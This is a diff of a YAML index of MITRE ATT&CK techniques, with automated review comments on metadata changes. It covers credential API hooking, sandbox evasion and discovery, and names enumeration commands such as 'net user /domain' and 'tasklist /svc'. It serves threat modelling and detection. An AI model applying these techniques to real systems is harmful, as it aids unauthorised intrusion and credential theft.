- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
- description: Stack Exchange - Security. (2012, July 31). What are the methods
- to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-27T21:03:56.385Z'
name: 'Input Capture: Credential API Hooking'
description: |
Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
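Review bot: this hunk strips the whole head of the T1056.004 object (`x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and an `external_references` list with the `mitre-attack` entry plus fourteen cited sources) without adding anything back in the same hunk; it is only correct because the following hunk re-emits every one of those keys lower in the object. Review by matching the removed and re-added `source_name` values one for one rather than trusting the line counts, since a citation dropped here would only surface as a dangling `(Citation: ...)` in the description. For T1556, `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` removed at the top are likewise moved, but `spec_version: '2.1'` is deleted outright, consistent with the rest of the file.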
@@ -48128,28 +48782,94 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ created: '2020-02-11T19:01:15.930Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
+ - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+ description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+ Retrieved December 18, 2017.
+ url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+ - source_name: Microsoft Hook Overview
+ description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+ December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
+ description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
+ description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+ 12, 2017.
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
+ description: Stack Exchange - Security. (2012, July 31). What are the methods
+ to find hooked functions and APIs?. Retrieved December 12, 2017.
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1056.004
atomic_tests: []
T1552.007:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:25:28.820Z'
name: Kubernetes List Secrets
description: "Adversaries may gather credentials via APIs within a containers
environment. APIs in these environments, such as the Docker API and Kubernetes
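Review bot: the T1056.004 object loses `x_mitre_permissions_required: - Administrator - SYSTEM` with no replacement, the same field drop seen for T1003.006 earlier in this diff, while `x_mitre_version` moves `'1.0'` to `'1.1'` and `x_mitre_attack_spec_version` `2.1.0` to `3.2.0`. Other objects in this same diff (T1556.004 and T1016.001 below) keep their `x_mitre_permissions_required` lists, so after merge the field is present for some techniques and absent for others; if the index is meant to reflect one upstream dataset version, the objects that still carry the field should be regenerated from the same source.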
@@ -48206,9 +48926,8 @@ credential-access:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.007
atomic_tests: []
T1556.004:
@@ -48239,7 +48958,7 @@ credential-access:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
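Review bot: the `modified` timestamp for T1556.004 moves backwards, from `'2022-05-11T14:00:00.188Z'` to `'2021-12-14T23:14:26.107Z'`. The same regression appears for several other techniques in this diff (T1613, T1016.001, T1615, T1652, T1069.002, T1007, T1120), and in every case the old value shares the `T14:00:00.188Z` time of day, which looks like a bulk-stamped release time rather than a per-object edit time. That makes the new values more plausible, but the commit should say which upstream bundle these objects were regenerated from, since a reviewer seeing `modified` decrease would otherwise read it as stale data being reintroduced.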
@@ -48263,8 +48982,6 @@ credential-access:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
discovery:
T1033:
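Review bot: after this hunk the T1556.004 object has neither `spec_version` nor any `x_mitre_attack_spec_version` (both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed and nothing is added), whereas the objects regenerated above (T1003.006, T1056.004, T1552.007) end up with `x_mitre_attack_spec_version: 3.2.0`. The object also still carries `x_mitre_permissions_required: - Administrator`, so it is a partially updated record. Either regenerate it from the same bundle as the others so it gets the `3.2.0` line, or document that objects without a new upstream revision are only stripped of `spec_version`.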
@@ -48329,12 +49046,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1033
atomic_tests: []
T1613:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:08:50.706Z'
name: Container and Resource Discovery
description: "Adversaries may attempt to discover containers and other resources
that are available within a containers environment. Other resources may include
@@ -48393,7 +49109,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1613
atomic_tests: []
T1016.001:
@@ -48414,7 +49129,7 @@ discovery:
- source_name: mitre-attack
external_id: T1016.001
url: https://attack.mitre.org/techniques/T1016/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-25T17:03:26.632Z'
name: 'System Network Configuration Discovery: Internet Connection Discovery'
description: |-
Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert
, and GET requests to websites.
@@ -48435,13 +49150,11 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1016.001
atomic_tests: []
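Review bot: T1016.001 has the same problem as T1556.004 above: `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed with no `3.2.0` replacement, and `x_mitre_permissions_required: - User` is retained, leaving the object without any spec version marker while neighbouring objects gain one. The `modified` value also steps back to `'2021-03-25T17:03:26.632Z'`. Consistent handling across the file would be easier to trust if all objects were regenerated from one bundle.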
T1069:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:03:06.294Z'
name: Permission Groups Discovery
description: |-
Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -48464,15 +49177,14 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Group: Group Metadata'
@@ -48498,13 +49210,12 @@ discovery:
url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1069.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:51:35.759Z'
name: Cloud Groups
description: |-
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -48529,12 +49240,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -48576,13 +49286,12 @@ discovery:
url: https://github.com/True-Demon/raindance
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1615:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-01-06T12:41:08.579Z'
name: Group Policy Discovery
description: |-
Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\SYSVOL\\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -48643,12 +49352,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1615
atomic_tests: []
T1652:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:07:16.804Z'
name: Device Driver Discovery
description: |-
Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -48712,19 +49420,18 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1652
atomic_tests: []
T1087.002:
technique:
- modified: '2024-04-15T21:33:57.732Z'
+ modified: '2024-05-31T04:00:37.651Z'
name: 'Account Discovery: Domain Account'
description: "Adversaries may attempt to get a listing of domain accounts. This
information can help adversaries determine which domain accounts exist to
aid in follow-on behavior such as targeting specific accounts which possess
particular privileges.\n\nCommands such as net user /domain
and
net group /domain
of the [Net](https://attack.mitre.org/software/S0039)
- utility, dscacheutil -q group
on macOS, and ldapsearch
+ utility, dscacheutil -q group
on macOS, and ldapsearch
on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
cmdlets including Get-ADUser
and Get-ADGroupMember
may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
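Review bot: the removed and added lines in the T1087.002 description (`- utility, dscacheutil -q group` / `+ utility, dscacheutil -q group` and the following `on macOS, and ldapsearch` lines) are textually identical, so this is a whitespace-only change inside a double-quoted folded scalar, most likely trailing spaces or a tab. Whitespace inside a quoted YAML scalar is significant, so the rendered description text may differ after this change; check the byte-level diff of those two lines and, if the change is unintended, normalise the exporter so it does not emit trailing whitespace in folded descriptions.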
@@ -48771,7 +49478,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.002
atomic_tests: []
T1087.001:
@@ -48838,12 +49544,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.001
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -48933,18 +49638,17 @@ discovery:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests: []
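Review bot: the `Deloitte Environment Awareness` reference changes its Google Drive URL from `.../1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc` to `.../1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit` and its retrieval date to September 13, 2024. An `/edit` suffix on a Drive file link is the editor view, which is not what an anonymous reader of a citation normally needs; confirm the link still resolves for a viewer without edit rights, since a `/view` form is the usual share link for a file. The other change in this hunk, `spec_version: '2.1'` removed from T1497.001, matches the rest of the diff.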
T1069.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:16:47.754Z'
name: 'Permission Groups Discovery: Domain Groups'
description: |-
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
@@ -48987,12 +49691,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.002
atomic_tests: []
T1007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:55:18.326Z'
name: System Service Discovery
description: |-
Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query
, tasklist /svc
, systemctl --type=service
, and net start
.
@@ -49033,12 +49736,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1007
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -49123,7 +49825,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests: []
T1135:
@@ -49185,12 +49886,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1135
atomic_tests: []
T1120:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:41.575Z'
name: Peripheral Device Discovery
description: 'Adversaries may attempt to gather information about attached peripheral
devices and components connected to a computer system.(Citation: Peripheral
@@ -49241,12 +49941,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1120
atomic_tests: []
T1082:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:42:22.247Z'
name: System Information Discovery
description: |-
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -49257,7 +49956,6 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Maril Vernon @shewhohacks
- Praetorian
@@ -49272,7 +49970,6 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- IaaS
@@ -49320,7 +50017,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1082
atomic_tests: []
T1016.002:
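Review bot: the three T1082 hunks are one logical move split across the object: `x_mitre_attack_spec_version: 2.1.0` is removed from just below `kill_chain_phases`, `x_mitre_modified_by_ref` is removed from below `x_mitre_is_subtechnique`, and both keys are re-added at the bottom with the spec version raised to `3.2.0`, alongside the usual `spec_version: '2.1'` deletion. The net effect is a version bump plus key reordering, which is fine, but a reviewer reading only the first two hunks would see two keys disappear; a stable key order in the exporter would have kept this to a single one-line change.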
@@ -49392,12 +50090,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:22:56.372Z'
name: Application Window Discovery
description: |-
Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -49439,122 +50136,73 @@ discovery:
- source_name: Prevailion DarkWatchman 2021
description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
new evolution in fileless techniques. Retrieved January 10, 2022.'
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1010
atomic_tests: []
T1087.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
- type: attack-pattern
- created: '2020-02-21T21:08:33.237Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.003
- url: https://attack.mitre.org/techniques/T1087/003
- - source_name: Microsoft Exchange Address Lists
- url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
- description: Microsoft. (2020, February 7). Address lists in Exchange Server.
- Retrieved March 26, 2020.
- - source_name: Microsoft getglobaladdresslist
- url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
- description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
- 2019.
- - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
- Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
- source_name: Black Hills Attacking Exchange MailSniper, 2016
- - source_name: Google Workspace Global Access List
- url: https://support.google.com/a/answer/166870?hl=en
- description: Google. (n.d.). Retrieved March 16, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-17T20:35:35.125Z'
name: Email Account
description: |-
Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
- In on-premises Exchange and Exchange Online, theGet-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+ In on-premises Exchange and Exchange Online, the Get-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_deprecated: false
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1497.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
+ id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+ created: '2020-02-21T21:08:33.237Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
